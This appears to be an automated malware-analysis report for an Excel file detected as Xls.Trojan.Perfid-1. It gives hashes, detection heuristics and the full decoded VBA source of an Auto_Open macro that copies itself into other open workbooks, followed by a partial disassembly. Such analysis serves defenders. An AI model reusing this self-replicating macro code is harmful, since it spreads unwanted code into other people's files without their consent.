Xls.Trojan.Perfid-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 40eb276d629e03d4…

MALICIOUS

Office (OLE)

38.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: da2602106e492bbbaaec11875277e33e SHA-1: 28d79a63c9cc19db599e26c97b37e201aa12c5fc SHA-256: 40eb276d629e03d4f6b2ec55a0b7fd12f38904b8ead44b2658e3ade86d185bd3
180 Risk Score

Malware Insights

Xls.Trojan.Perfid-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a high-severity Auto_Open VBA macro, identified by ClamAV as Xls.Trojan.Perfid-1. The macro's purpose is to infect other open Excel workbooks by adding a description sheet and copying itself, thereby spreading the infection. It also attempts to inform the user about the infection and removal process.

Heuristics 3

  • ClamAV: Xls.Trojan.Perfid-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Perfid-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9119 bytes
SHA-256: caa9306959cfd582a69ee3c4197c307dd077001b0be9ce111db9a04504615828
Detection
ClamAV: Xls.Trojan.Perfid-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Tstvr"

Option Explicit
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
' Test virus version 1.0
' Infects MS-Excel files
' When opened, searches for a victim among currently
' open workbooks
' This version adds an extra sheet to infected workbook telling
' the owner how to remove the virus
' Besides, it displays a message telling whether infection was
' successfull or not
'
Const VirModulName = "Tstvr"
Const DescrSheetName = "Tstvr_Descr"
Dim ActiveName As String  ' Name of the infector file
Dim VictimName As String  ' Name of the victim
Dim InfectSuccess As Boolean ' Indicates that
Dim TestDupNames As Boolean
Dim i As Integer, j As Integer
Dim DummyMsg As Integer
' Initialisation
'
  Application.ScreenUpdating = False
  ActiveName = ActiveWorkbook.Name
  InfectSuccess = False
' Searching for a potential victim
'
  For i = 1 To Workbooks.Count
    If Workbooks(i).Name <> ActiveName Then
' This one could be a victim...
'
      VictimName = Workbooks(i).Name
' Activating victim...
'
      Workbooks(i).Activate
      If Modules.Count = 0 Then
' An infection attempt only will be made when the victim has no macros
'
        On Error Resume Next
        TestDupNames = False
        For j = 1 To Sheets.Count
         If Sheets(j).Name = DescrSheetName Or Sheets(j).Name = VirModulName Then
            TestDupNames = True
            Exit For
         End If
       Next j
       If Not (TestDupNames) Then
         Sheets.Add
         ActiveSheet.Name = DescrSheetName
         If Err = 0 Then
' Description sheet added successfully
'
' Now, adding the description of the virus
' and instructions for removing
'
           Cells(1, 1).Value = "This file was infected by test virus v. 1.0"
             If Err = 0 Then
               Cells(2, 1).Value = "To remove virus, simply close this file without saving it"

             If Err = 0 Then
               Cells(3, 1).Value = "or delete the macro module named " + VirModulName + " and this decsription sheet"
        

' Copying the virus itself
'
                Workbooks(ActiveName).Activate
                Sheets(VirModulName).Copy Before:=Workbooks(VictimName).Sheets(1)
                InfectSuccess = True
                Exit For
            End If
            End If
          End If
        End If
      End If
    End If
  Next i
' Testing if infection was successfull
'
  If InfectSuccess Then
    DummyMsg = MsgBox("Successfully infected workbook " & VictimName, , "Test Virus reports...")
    Workbooks(VictimName).Sheets(DescrSheetName).Activate
  Else
    DummyMsg = MsgBox("Couldn't infect any workbook ", , "Test Virus reports...")
  End If
  Application.ScreenUpdating = True
End Sub 'of test_vir
    

  

' Processing file: /opt/analyzer/scan_staging/69b11874e8544e9ba72c22e15f050293.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Tstvr - 5557 bytes
' Line #0:
' Line #1:
' 	Option  (Explicit)
' Line #2:
' 	FuncDefn (Sub auto_open())
' Line #3:
' 	QuoteRem 0x0000 0x0017 " Test virus version 1.0"
' Line #4:
' 	QuoteRem 0x0000 0x0017 " Infects MS-Excel files"
' Line #5:
' 	QuoteRem 0x0000 0x0033 " When opened, searches for a victim among currently"
' Line #6:
' 	QuoteRem 0x0000 0x000F " open workbooks"
' Line #7:
' 	QuoteRem 0x0000 0x003E " This version adds an extra sheet to infected workbook telling"
' Line #8:
' 	QuoteRem 0x0000 0x0022 " the owner how to remove the virus"
' Line #9:
' 	QuoteRem 0x0000 0x003D " Besides, it displays a message telling whether infection was"
' Line #10:
' 	QuoteRem 0x0000 0x0013 " successfull or not"
' Line #11:
' 	QuoteRem 0x0000 0x0000 ""
' Line #12:
' 	Dim (Const) 
' 	LitStr 0x0005 "Tstvr"
' 	VarDefn VirModulName
' Line #13:
' 	Dim (Const) 
' 	LitStr 0x000B "Tstvr_Descr"
' 	VarDefn DescrSheetName
' Line #14:
' 	Dim 
' 	VarDefn ActiveName (As String)
' 	QuoteRem 0x001A 0x001A " Name of the infector file"
' Line #15:
' 	Dim 
' 	VarDefn Vic
... (truncated)